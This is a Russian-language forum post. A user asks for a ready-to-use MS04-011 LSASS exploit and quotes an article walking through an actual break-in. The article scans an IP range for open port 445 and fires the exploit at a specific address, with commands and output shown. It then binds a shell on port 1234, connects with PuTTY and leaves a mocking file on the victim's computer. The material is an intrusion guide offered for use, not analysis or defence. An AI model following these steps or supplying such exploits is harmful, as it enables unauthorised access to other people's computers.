Очень интересная статья про использование эксплойта автор все описал в подробности но !!!!!!! не написал как
у него сделан эксплойт !!!!!!!
Вопрос может кто нить и настроить исходник так что бы он открывал порт 1234 когда когда отакуешь через
445 порт а то я где то скачал но не на сайте securitylab.ru файл ms04011lsass.rar он только открывает 445 когда
порт уже открыт вообщем пишет так !!!!!!!
пишу expl.exe to xxx.xxx.xxx.xxx и порт 1234 в строке выдаеться типа
дело в том что я не умею компилировать файлы ((((((
[*]Connecting to 213.247.202.182 445…ok! а у автора статьи выдает порт 1234 вот в чем гвоздь
[*]Attacking…ok!
Прочитайте статью и помогите чем можно напешите на почту
hack99999@rambler.ru или на форуме плиз если
есть настроенный эксплойт дайте ссылку плиз !!!!! за ранее спасибо yhamobi
ссылка на эксплойт есть в статье там исходник !!!!!!!!!
А вот и сама статья
Автор:gemagla.b1n
Цель эксплоита: Remote DoS, Remote System
Воздействие эксплоита: Windows 2000 sp4, Windows XP sp1
Автор эксплоита: houseofdabus
Описание уязвимости:
http://www.securitylab.ru/44490.html
Скачать эксплоит:
http://www.securitylab.ru/_Exploits/200 ... 1lsass.rar
В этой статье я буду на реальном примере возводить эксплоит и опишу основные моменты использования
уязвимости.
Lets begin.
Для начала нам нужно слить эксплоит.сливаем….в моем случае я закачивал сорсы(исходники) и
откомпилировал.
Также понадобится любой сканер,я буду использовать ][Spider 6.5.Для меня он является самм лучшим и
надежным.
Также обяателен любой telnet-клиент,я воспользовался SecureCRT.
Target.
Вот тут нам понадобится сканер Х-spider.С помощью его надо найти цель.Как известно,на машине должен быть
открыт 445 порт.Этим и надо воспользоваться.Я пользовался Х-spiderом.Он легкий,не требователен к
ресурсам,имеет удобный интерфейс,да еще и бесплатно….=)
Надо найти цеь..В меню Х-spiderа выбираем Поиск и указываем диапазон IP-адрессом и ставим условие на
открытый 445 порт.
Вот что показад мне сканер:
- 213.247.202.177
- 213.247.202.178
- 213.247.202.179
- 213.247.202.180
- 213.247.202.181
+ 213.247.202.182
- 213.247.202.183
Видите +?Значит это машина с открытым 445 портом!Цель найдена.Это был только первый шаг.
Lets attack!
После того,как цель найдена,приступаем к возведению сплоита.Вот как это надо 10делать…
Для начала определим удаленную ОС.Делаем это так…
Запускаем коммандную строку и задаем путь к сплоиту..
C:expl.exe
Смотрим на поле Targets.0-ОС ХР. Если мы зададим параметр –t,то можно определить удаленную ОС
C:expl.exe 0 213.247.202.182 1234-t
Результат:
Target:IP: 213.247.202.182: OS:WinXP Professional [universal] lsass.exe
[*] connecting to 213.247.202.182 …OK
[*] Detecting remote OS:Windows 5.1
Смотрим вверх….5.1….
Detect remote OS:
Windows 5.1-WinXp
Ось мы определили …..ХР!
Далее прсто пишем
C:expl.exe 0 213.247.202.182 1234 (без префикса –t)
[*]Connecting to 213.247.202.182 1234…ok!
[*]Attacking…ok!
Вот мы и соверили атаку на машину..
Теперь биндим там порт(я выбрал 1234,как вы видите)
Опять пишем:
C:expl.exe 0 213.247.202.182 1234
Повторяется все тоже самое,но теперь я забиндил 1234 порт на компе цели.
Теперь коннектимся…
Я запускаю PuTTy и на вкладке Session указыва АйПи машины,порт(1234) и коннектюсь по протоколу Raw.
Конектимся…и мы уже в машине …Задача выполнена…но!Не зря же мы старались..Надо немнофка пофалить!
Я оставлюя командой echo привет на компе!
C:>echo прива!Ламер ушастый!gemagla.b1n and Bcteam have you >hello.txt(оставляю послание в файле hello.txt)
Вот и все!Я вскрыл машины,оставил сообщение =)
Что я могу сказать по этому поводу?Во-первых эксплоит ,приминенный мною,основан на RPC dcom.Бага еще
до сих пор актуальна…
http://www.microsoft.com/technet/securi ... 4-011.mspx -патч.
В этот раз мне повезло…атака прошла успешно!Но мог бы быть и такой вариант:
Причин этому может быть несколько:
- помешал запущенный Firewall;
- объект атаки оказался пропатчен;
- не подошла версия операционной системы;
- компьютер жертвы вышел из сети
gemagla